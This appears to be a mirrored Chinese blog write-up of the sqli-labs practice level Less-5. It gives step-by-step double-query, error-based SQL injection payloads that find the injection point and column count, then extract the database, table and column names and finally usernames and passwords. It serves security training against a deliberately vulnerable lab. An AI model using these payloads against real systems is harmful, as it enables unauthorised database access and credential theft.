zoukankan      html  css  js  c++  java
  • Less-5-02

    0x01判断注入类型

    字符型_单引号_双注入

    ?id=1
    ?id=1'
    ?id=1"
    

    单引号字符型注入,1,3显示youarein,2单引号报错


    0x02 判断字段数

    ?id=1'order by 3--+
    #字段数为3
    

    ?id=-1' union select 1,2,3--+
    #无回显
    

    0x03 双注入判断数据库名

    ?id=-1' union select 1,count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a--+
    #得到数据库名为security
    

    0x04 判断表名

    ?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',table_name) from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+
    #使用group_concat()没有回显,所以使用concat_ws() limit 0,1逐个爆出表名
    

    ?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',table_name) from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables group by a--+
    #得出表user
    

    0x05 判断列名

    ?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',column_name) from information_schema.columns where table_name='user' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+
    #使用concat_ws() limit 0,1逐个爆出列名
    

    ?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',column_name) from information_schema.columns where table_name='user' limit 1,1),floor(rand()*2)) as a from information_schema.tables group by a--+
    

    ?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',column_name) from information_schema.columns where table_name='user' limit 2,1),floor(rand()*2)) as a from information_schema.tables group by a--+
    

    0x06得到数据

    ?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',id,username,password) from users limit 0,1),floor(rand()*2)) as a from information_schema.columns group by a--+
    

  • 相关阅读:
    读书笔记 1 --《码出高效:java开发手册》
    TCP
    同步、异步、阻塞、非阻塞
    MongoDB 概述
    mysql连接不释放
    R-CNN学习笔记
    吴恩达深度学习笔记(十二)—— Batch Normalization
    吴恩达深度学习笔记(十一)—— dropout正则化
    《统计学习方法》笔记第二章 —— 感知机
    《机器学习基石》第一周 —— When Can Machine Learn?
  • 原文地址:https://www.cnblogs.com/observering/p/13501497.html
Copyright © 2011-2022 走看看